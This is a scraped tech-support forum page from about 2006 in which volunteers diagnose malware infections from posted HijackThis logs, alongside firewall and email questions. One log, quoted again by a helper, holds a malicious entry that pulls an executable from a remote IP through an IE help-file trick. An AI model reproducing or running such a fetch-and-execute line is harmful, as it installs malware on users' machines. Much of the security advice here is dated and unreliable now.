Solve : Computer freezes - need help?

Answer»

The issue is - whenever any application attempts to connect to the internet, the machine freezes. I have already dropped the partition and reformatted, but the problem remains.

Any thoughts??

You will need to post a LOT more information. This is not enough.  irastotle......
Quote

The issue is - whenever any application attempts to connect to the internet, the machine freezes. I have already dropped the partition and reformatted, but the problem remains.

Because you posted here , you must have been visited by a virus or a trojan ........ which one was it ?

You have already been asked ..... You will need to post a LOT more information.   when can we expect a response ?


dl65  

Thanks. This is what I know.

Dell Dimension 2400 /w XP Home SP1
Integrated Broadcom NIC (comcast cable modem)

Not sure how it started - turned it on in the morning and it froze up.
I ran Norton AV, Spybot S&D and Xoftspy - removed what was there (not a whole lot - i keep it clean).
Turned off Norton Firewall (just in case).
Dropped the partition (twice) and reformatted (twice) - HD 37139 Mb Partitioned - 8 Mb unpartitioned.
Reinstalled the os w/ sp1 (and all the necessary drivers) and Norton Firewall and AV
Still the same - installed Xoftspy again and a couple of Dell's diagnostic programs - all turn up nothing
Dropped the partition (twice) and reformatted (twice) again - reinstalled the os w/ sp1 (and all the necessary drivers) again and only McAfee AV - still the same

That's where we stand at the moment.
Please, if you need more info, let me know.

Thanks.

irastotle........ How long does it take before it locks up on you ?


dl65  It takes about 3 sec from the time you see either the live update icon or the windows update icon in the tray or attempt to open IE.The first THING to do is install SP2 (Slipstreaming it would be better).
What do you mean exactly by "dropped the partition"?
Do the event logs show anything?Does your modem look OK in the Device Manager?I am working on OBTAINING a copy of XP SP2 as soon as I do I will install.
I booted from the XP disk to reload to OS - deleted the partition, created a new partition and reinstalled the OS and drivers

As far as the Device Mgr goes - everything looks fineXP SP2.

Is the XP CD a copy? Is there existing data stored elsewhere on the system? If either is true, you may well be reinfecting yourself every time you reinstall.The XP CD is the factory CD from Dell.
How do I know if there is existing data stored elsewhere?Ok, XP SP2 has been installed and it appears to be slightly better...
IE opens and msn loads, but freezes in about 5-7 sec.

Currently, McAfee is installed - not sure if that is causing a conflict or not.

I have a few things to do this evening and may not have a chance to get back to the machine today...

My NEXT plan of action is to start over from scratch again - deleting the partition/recreating it  and installing only the OS, SP1, SP2 and the necessary drivers --- unless someone has a better idea?? Quote
The XP CD is the factory CD from Dell.
How do I know if there is existing data stored elsewhere?

You have a restore CD rather than an XP CD?
Do you have any other hard drives or partitions with any files etc on them?
I quess it's a restore CD.  Will that matter?


There are no additional hard drives and the only two items that show up on the partition screen are the main partition (C:) 37139 Mb and unpartitioned space 8 Mb.  So, I do not believe that there are any additional files on the pc.OK, so there's no risk of reinfection from stored files. Personally, I hate restore CDs as they reinstall the same old crud every time.
  • Reinstall the system but do not connect to the internet or any other network. Uninstall any unnecessary crud and install SP2.
  • Now install a firewall (Kerio 215 is very good and free) and disable the Windows firewall via the services console.
  • Open Control Panel>Folder Options>View and set it up as marked in the attached image. Don't forget to hit the "Apply" button and then the "Apply to all folders" button before finally OK'ing it.
  • Open C:\Windows\System32\Drivers\Etc\hosts in Notepad and copy the entire contents of this file to it, overwriting what's there and save it.
  • Set up your internet connection.
  • Now connect to Windows Update and choose the custom option. Install only the critical updates.
  • Now disconnect and install your AV software, Spybot S&D, Ad-Aware and SpywareBlaster. Update each, run them and fix anything that's found.(SpywareBlaster only needs to be updated and it's protection fully enabled).
  • Download and run XP-AntiSpy. Use it's default settings for now and I'll advise on it fully later.
Now you can install your email accounts etc and software items one at a time, setting restore points as you go.
119.

Solve : Malwares Plz help?

Answer»

Hi

PLZ help me

I am connected to internet all day. Sometimes when i work i lose control of my mouse completely. it closes all my applications and open ms word and start typing "when the sky is dark malwares peek their head and it is time to have some fun" .

I have run symantec antivirus with UPDATED virus definitions still no virus found

I have run ad aware and mc afee anti spyware still no response.

Plz help me

When i disconnect internet everything work perfect.

If someone have an idea of what is it plz let me know..

ThanksDo you have a firewall running? faizalb15...... Is your pc connected to the net via a network or as a STAND alone ?

Which OPERATING system are you using ?
Can you scan your pc with hijackthis and post the logfile here for us to look at .


dl65  no i dont have a firewall...

I am connected via a lan and the OS is win xp

Where can i can the hijackthis to scan the pc?

Plz help me

thanks

Get a firewall, Sygate is nice. Version 5.5 Build 2710
http://207.33.111.31/spf/

Get Hijackthis.
http://www.hijackthis.de/index.php?langselect=english faizalb15....You can download hijackthis from.......
http://www.download.com/HijackThis/3000-8022_4-10227353.html  

Install it into a folder on your desktop ........


dl65  Only download Hijackthis and other similar tools from trusted sites!!!!!
Hijackthis.de is not yet established and download.com is one of the most infected sites on the net!

In no particular order and apologies to those I've missed out:
www.spywareinfo.com
www.majorgeeks.com
www.tomcoyote.org
www.castlecops.com
www.subratam.org
www.lockergnome.com


This sounds like an RCT. Whilst it may be a prank, it could carry some very serious implications.
Carry out the procedures outlined in this post and report back.


Quote

download.com is one of the most infected sites on the net!

I have noticed that you have made that comment before .........What are you basing that on ........ I and many others have D/L utilities from that location on many occassions and have never had any issues.
If you could site some reliable sources it would be helpful.

dl65  
This is the first link that I found via Google. There are sources which support my statement all over the internet:
http://www.lifehacker.com/software/spyware-cleaners/downloadcom-congratulates-self-for-filtering-spyware-101399.php
Those that have been security concious and aware of security issues for some time know well that downloaddotcom is/was an infected rats nest.

The first rule of malware detection/prevention is to download anti malware utilities etc from the authors site or from trusted security sources only. Go anywhere else and you're asking for trouble.Thanks for the info. I never go there, but AdAware links to it on their site even!http://www.hijackthis.de/index.php?langselect=english
Quote
Due to a few misunderstandings, I just want to make it clear that this site provides only an online analysis, and [highlight]not[/highlight] HijackThis the program.
The site has a direct download link to http://www.mmdirect.de/downloads/hijackthis_199.zipHijackthis.de has improved a little of late but do a search on it's history. I don't really care who links to what. Downloaddotcom is/was a cesspit and it's wise to avoid it.
In both instances, it's a case of leopards and spots. As yourselves this question, would you trust someone who has continually conned you over the years?
I repeat:
The first rule of malware detection/prevention is to download anti malware utilities etc from the authors site or from trusted security sources only. Go anywhere else and you're asking for trouble.Backdated......  I appreciate your feedback as far as the link is concerned.......but......that referance was dated ....April 28th , 2005
Quote
CNET’s Download.com has always been a dodgy place to get software, and today they’ve proved it. As of yesterday, Download.com STARTED testing their software for adware and spyware - and removed nearly 600 products from their index in the process.
........ yes perhaps there were issues in the past , however ...... it would appear they have the issue under control. I certainly have no connection to Download.com and as stated before ...... I and many others have D/L utilities from that location on many occassions and have never had any issues.  

I am giving you first hand experience ...re downloading from that site , not some year old comment .

dl65  
 

As I said, that was the first link I came across in Google. There are well documented accounts all over the net and I have had perhaps not first hand experience but I had to deal with a system that was heavily infected after a trojan downloader was included as an added extra in a file from ddcom.
This was only about 2 months ago. As I said, leopards and spots.

If you give advice to users regarding the subject of virus/malware removal and prevention, please direct them to trusted sources only if they need tools etc.
It's not too much to ask is it? Backdated .........
Quote
I have had perhaps not first hand experience but I had to deal with a system that was heavily infected after a trojan downloader was included as an added extra in a file from ddcom.
I tend to offer advice or opinions based on first hand experience rather than he said , she said information.

dl65  


120.

Solve : Firewall and MSN Messenger - probs a silly ques?

Answer»

hi, sorry if this is a really FOOLISH question
ive just got a laptop, with WIndows XP, and it came with all the Norton ANtivirus 2005 protection
I have been trying to access my MSN Messenger (7.5), but it says that it has been blocked due to firewall and proxy settings from a 3rd party security software, which I presume is the Norton firewall.
So how do I configure Firewall to prevent it from blocking MSN Messenger, and in doing this will I increase the risk my laptop is at???
Thank you xx A lot of crapware and viruses travel via instant message. That call is yours, if you want it. You can adjust Norton to let it work, though.Hes23...  open Norton 2005.......... click on options........then in the internet SECTION on the LEFT ...click on Instant Messenger ...... then make SURE that MSN /windows messenger is checked ...
Are you at risk with this ....no not really ..........Unless someone you KNOW or has you on their list sends something infected to you ...but Norton should get it .
Do you have any firewall running which may be blocking MSN messenger ......go to control panel and check the security centre.
hope this helps you

dl65  hi yeah thank you so much for the help. I went to make sure that MSN MEssenger was checked and it was.

121.

Solve : looking for virus infomation?

Answer»

if you are interested in knowing about VIRUSES, then visit www.skillsheaven.com..
everyday you will GET some NEW INFORMATION ..
 amit_kumar_ipec........  Don't you know ...there is no solicitating allowed on this site .........

DL65  Is a good site

122.

Solve : Can not change desktop?

Answer»

I am running a windows xp pro OS with an athlon 2200 and 1 gig of ram.There is a big black box with the words spyware infectionn in the center of my desktop.I am unable to change my desktop in anyway .I have run spybot,adaware,and ewido antispyware programs as WELL as NORTON antivirusto no avail.I have a hijack this log that will be posted belowAny help or hints will be greatly appreciated.


Logfile of HijackThis v1.98.2
Scan saved at 9:04:16 PM, on 2/24/2006
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\NORTON~1\NORTON~1\navapw32.exe
C:\PROGRA~1\NORTON~1\WinFax\WFXSWTCH.exe
C:\Program Files\Java\jre1.5.0_02\bin\jusched.exe
C:\Program Files\Logitech\MouseWare\system\em_exec.exe
C:\Program Files\Norton SystemWorks\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton SystemWorks\Norton Utilities\NPROTECT.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\Spyware Doctor\sdhelp.exe
C:\Program Files\ewido anti-malware\ewidoguard.exe
C:\Program Files\ewido anti-malware\ewidoctrl.exe
C:\WINDOWS\explorer.exe
C:\Documents and Settings\Richard\Local Settings\Temp\Temporary Directory 1 for hijackthis.zip\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = res://C:\WINDOWS\emhvv.dll/sp.html#88449%resultposition.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = about:blank
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R3 - Default URLSearchHook is missing
O2 - BHO: (no name) - SOFTWARE - (no file)
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: PCTools Site Guard - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - C:\PROGRA~1\SPYWAR~1\tools\iesdsg.dll
O2 - BHO: PCTools Browser Monitor - {B56A7D7D-6927-48C8-A975-17DF180C71AC} - C:\PROGRA~1\SPYWAR~1\tools\iesdpb.dll
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton SystemWorks\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton SystemWorks\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [NAV Agent] C:\PROGRA~1\NORTON~1\NORTON~1\navapw32.exe
O4 - HKLM\..\Run: [WFXSwtch] C:\PROGRA~1\NORTON~1\WinFax\WFXSWTCH.exe
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [Ad-watch] "C:\Program Files\Lavasoft\Ad-aware 6\Ad-watch.exe"
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0_02\bin\jusched.exe
O4 - HKCU\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe
O4 - HKCU\..\Run: [msmc] C:\WINDOWS\System32\msgked.exe
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_02\bin\npjpi150_02.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_02\bin\npjpi150_02.dll
O9 - Extra button: Spyware Doctor - {2D663D1A-8670-49D9-A1A5-4C56B4E14E84} - C:\PROGRA~1\SPYWAR~1\tools\iesdpb.dll
O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://C:\foo.mht!http://195.225.177.13/573/online.chm::/on-line.exe
O16 - DPF: {2BC66F54-93A8-11D3-BEB6-00105AA9B6AE} (Symantec AntiVirus scanner) - http://security.symantec.com/sscv6/SharedContent/vc/bin/AvSniff.cab
O16 - DPF: {469C7080-8EC8-43A6-AD97-45848113743C} - http://akamai.downloadv3.com/binaries/IA/nethv32_EN_XP.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1139874772312
O16 - DPF: {644E432F-49D3-41A1-8DD5-E099162EEEC5} (Symantec RuFSI Utility Class) - http://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab

The following seems nasty. It might or might not be (sometimes the log analyzer mistakes a GOOD file that it has never seen before for a bad one, just becuase it sends information, etc.)

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = res://C:\WINDOWS\emhvv.dll/sp.html#88449%resultposition.net

         R3 - Default URLSearchHook is missing

       O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://C:\foo.mht!http://195.225.177.13/573/online.chm::/on-line.ex e

O16 - DPF: {469C7080-8EC8-43A6-AD97-45848113743C} - http://akamai.downloadv3.com/binaries/IA/nethv32_EN_XP.cab

FlameYeah, I don't think that's normal.  Particularly....well, all of it, but the part where it says "on-line.ex e".  That seems like it's trying to avoid being detected....I would concur with Flame's take on that HJT logfile.

-rockStormyport......
In addition to the entries Flame mentioned , you should also remove .....

O2 - BHO: (no name) - SOFTWARE - (no file)

In addition to those ...... why have you not installed SP2 ?
and you don't SEEM to be running any sort of software firewall ........


dl65  This is a Smitfraud infection. Go here, read the documentation and then download and run SmitRem as instructed.

123.

Solve : Slow Outlook 2003 (Using Hotmail)?

Answer»

Hi,

In Outook 2003, I have put a Hotmail account (I can't make a Hotmail the normal Inbox).

However, when I open OUTLOOK, everything is quick and fine, but when I click on "Hotmail Inbox" It can take up to a MINUTE to actually open. I've been TOLD this is not right and shouldn't be doing this.

I've tried deleting most of my messeges, but it doesn't make the slightest difference.

Thanks in advance,

OllyAnyone? Please?You MIGHT  want to google for the difference between POP and IMAP.

Here's a start:

http://www.imap.org/

124.

Solve : Problems removing NEWDOTNET?

Answer»

[size=14]Hi there... A while back I thought I had cleaned everything and apparently my HJT file looked good. Well, I was searching for a file the other day and noticed that NewDotNet still has a file on my computer. I tried running every free program listed here (and listed on another site) and the file is still there. I then tried to manually remove it and my computer wouldn't bring up windows after that. I did a system restore and am now back to where I was before. I reran all the cleaning/scanning programs and am here to see if you awesome folks might have an idea of what to do to get rid of this problem! Thanks so much in advance![/size]

HJT Log:

Logfile of HijackThis v1.99.1
Scan saved at 11:22:14 AM, on 2/24/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\acsd.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\NavNT\defwatch.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\NavNT\rtvscan.exe
C:\Program Files\NavNT\vptray.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\wanmpsvc.exe
C:\Program Files\Ahead\InCD\InCD.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Viewpoint\Viewpoint Manager\ViewMgr.exe
C:\PROGRA~1\BILLPS~1\WINPAT~1\winpatrol.exe
C:\Program Files\Logitech\Video\LogiTray.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\LVComS.exe
C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\MsgSys.EXE
C:\WINDOWS\System32\svchost.exe
C:\Program Files\ewido anti-malware\ewidoguard.exe
C:\Program Files\ewido anti-malware\ewidoctrl.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\Admin\Desktop\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.lsjc.org/
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\Userinit.exe
O1 - Hosts: Usage Information:
O1 - Hosts: Save Changes - Save any changes you make to hosts file
O1 - Hosts: Reset Default - Will Replace any existing Hosts with a Windows Default one, original file doesn't have to exist
O1 - Hosts: Save Log - Will Save the Hosts as a Text file, Good for Posting
O1 - Hosts: _______________________________________ __________________________
O1 - Hosts: Enable and Disable - Will Swap Hosts Files On the Fly for those that want to use Hosts, and Temporarily Disable it.
O1 - Hosts: _______________________________________ __________________________
O1 - Hosts: Scan for Hosts - Will Search your Windows Drive for Hosts Files, useful if Hosts is in wrong location or installed to Alternate location by Trojan.
O1 - Hosts: Delete - Does exactly that, Delete and Hosts File Selected in the Listbox.
O1 - Hosts: _______________________________________ __________________________
O1 - Hosts: By Option^Explicit, [email protected]
O2 - BHO: ADOBE PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Verizon Broadband Toolbar - {4E7BD74F-2B8D-469E-D0FC-E57AF4D5FA7D} - C:\PROGRA~1\COMMON~1\VERIZO~1\SFP\vzbb.dll (file MISSING)
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: Verizon Broadband Toolbar - {4E7BD74F-2B8D-469E-D0FC-E57AF4D5FA7D} - C:\PROGRA~1\COMMON~1\VERIZO~1\SFP\vzbb.dll (file missing)
O4 - HKLM\..\Run: [Openwares LiveUpdate] C:\Program Files\LiveUpdate\LiveUpdate.exe
O4 - HKLM\..\Run: [vptray] C:\Program Files\NavNT\vptray.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Ahead\InCD\InCD.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe"  -osboot
O4 - HKLM\..\Run: [ViewMgr] C:\Program Files\Viewpoint\Viewpoint Manager\ViewMgr.exe
O4 - HKLM\..\Run: [WinPatrol] C:\PROGRA~1\BILLPS~1\WINPAT~1\winpatrol.exe
O4 - HKLM\..\Run: [LogitechVideoTray] C:\Program Files\Logitech\Video\LogiTray.exe
O4 - HKLM\..\Run: [LogitechVideoRepair] C:\Program Files\Logitech\Video\ISStart.exe
O4 - HKLM\..\Run: [Auto EPSON Stylus Photo RX500 on DAVID] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S4I2K1.EXE /P38 "Auto EPSON Stylus Photo RX500 on DAVID" /O16 "\\DAVID\EPSONSty" /M "Stylus Photo RX500"
O4 - HKLM\..\Run: [zBrowser Launcher] C:\Program Files\Logitech\iTouch\iTouch.exe
O4 - HKLM\..\Run: [YBrowser] C:\Program Files\Yahoo!\browser\ybrwicon.exe
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKCU\..\Run:Did you first turn off system restore and do all the scans in safe mode? If not, do so now and then re-run Hijack this and post your log file.Ok....I turned off system restore (sorry I forgot it was on in the 1st place) and re-ran all the little programs I had run before...here is the newest HJT log....does it even look any different? lol

Logfile of HijackThis v1.99.1
Scan saved at 2:10:44 PM, on 2/24/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Userinit.exe
C:\WINDOWS\Explorer.EXE
C:\Documents and Settings\Admin\Desktop\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.lsjc.org/
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\Userinit.exe
O1 - Hosts: Usage Information:
O1 - Hosts: Save Changes - Save any changes you make to hosts file
O1 - Hosts: Reset Default - Will Replace any existing Hosts with a Windows Default one, original file doesn't have to exist
O1 - Hosts: Save Log - Will Save the Hosts as a Text file, Good for Posting
O1 - Hosts: _______________________________________ __________________________
O1 - Hosts: Enable and Disable - Will Swap Hosts Files On the Fly for those that want to use Hosts, and Temporarily Disable it.
O1 - Hosts: _______________________________________ __________________________
O1 - Hosts: Scan for Hosts - Will Search your Windows Drive for Hosts Files, useful if Hosts is in wrong location or installed to Alternate location by Trojan.
O1 - Hosts: Delete - Does exactly that, Delete and Hosts File Selected in the Listbox.
O1 - Hosts: _______________________________________ __________________________
O1 - Hosts: By Option^Explicit, [email protected]
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Verizon Broadband Toolbar - {4E7BD74F-2B8D-469E-D0FC-E57AF4D5FA7D} - C:\PROGRA~1\COMMON~1\VERIZO~1\SFP\vzbb.dll (file missing)
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: Verizon Broadband Toolbar - {4E7BD74F-2B8D-469E-D0FC-E57AF4D5FA7D} - C:\PROGRA~1\COMMON~1\VERIZO~1\SFP\vzbb.dll (file missing)
O4 - HKLM\..\Run: [Openwares LiveUpdate] C:\Program Files\LiveUpdate\LiveUpdate.exe
O4 - HKLM\..\Run: [vptray] C:\Program Files\NavNT\vptray.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Ahead\InCD\InCD.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe"  -osboot
O4 - HKLM\..\Run: [ViewMgr] C:\Program Files\Viewpoint\Viewpoint Manager\ViewMgr.exe
O4 - HKLM\..\Run: [WinPatrol] C:\PROGRA~1\BILLPS~1\WINPAT~1\winpatrol.exe
O4 - HKLM\..\Run: [LogitechVideoTray] C:\Program Files\Logitech\Video\LogiTray.exe
O4 - HKLM\..\Run: [LogitechVideoRepair] C:\Program Files\Logitech\Video\ISStart.exe
O4 - HKLM\..\Run: [Auto EPSON Stylus Photo RX500 on DAVID] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S4I2K1.EXE /P38 "Auto EPSON Stylus Photo RX500 on DAVID" /O16 "\\DAVID\EPSONSty" /M "Stylus Photo RX500"
O4 - HKLM\..\Run: [zBrowser Launcher] C:\Program Files\Logitech\iTouch\iTouch.exe
O4 - HKLM\..\Run: [YBrowser] C:\Program Files\Yahoo!\browser\ybrwicon.exe
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: America ONLINE 9.0 Tray Icon.lnk = C:\Program Files\America Online 9.0\aoltray.exe
O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ?
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: &Viewpoint Search - res://C:\Program Files\Viewpoint\Viewpoint Toolbar\ViewBar.dll/CXTSEARCH.HTML
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\npjpi150_06.dll
O9 - Extra 'Tools' menuitem: Sun Java CONSOLE - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\npjpi150_06.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra button: WeatherBug - {AF6CABAB-61F9-4f12-A198-B7D41EF1CB52} - C:\PROGRA~1\AWS\WEATHE~1\Weather.exe (HKCU)
O16 - DPF: {0A5FD7C5-A45C-49FC-ADB5-9952547D5715} (Creative Software AutoUpdate) - http://www.creative.com/su/ocx/12119/CTSUEng.cab
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} - http://www.kaspersky.com/downloads/kws/kavwebscan.cab
O16 - DPF: {193C772A-87BE-4B19-A7BB-445B226FE9A1} (ewidoOnlineScanHere is the rest since it wouldn't let me put it all in there....


O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai.net/7/840/537/2004061001/housecall.trendmicro.com/housecall/xscan53.cab
O16 - DPF: {9522B3FB-7A2B-4646-8AF6-36E7F593073C} (cpbrkpie Control) - http://a19.g.akamai.net/7/19/7125/4021/ftp.coupons.com/v3123/cpbrkpie.cab
O16 - DPF: {9E17A5F9-2B9C-4C66-A592-199A4BA1FBC8} - http://pictures06.aim.com/ygp/aol/plugin/upf/AOLUPF.en-US-AIM.9.5.1.7.cab
O16 - DPF: {A48D0309-8DA3-41AA-98E4-89194D471890} (Pulse V5 ActiveX Control) - http://www.pulse3d.com/players/english/5.2/win/PulsePlayer5.2AxWin.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMessengerSetupDownloader.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://zone.msn.com/binFramework/v10/ZIntro.cab34246.cab
O16 - DPF: {D18F962A-3722-4B59-B08D-28BB9EB2281E} (PhotosCtrl Class) - http://photos.yahoo.com/ocx/us/yexplorer1_9us.cab
O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} (PopCapLoader Object) - http://zone.msn.com/bingame/dim2/default/popcaploader_v6.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://www.creative.com/su/ocx/12119/CTPID.cab
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll" (file missing)
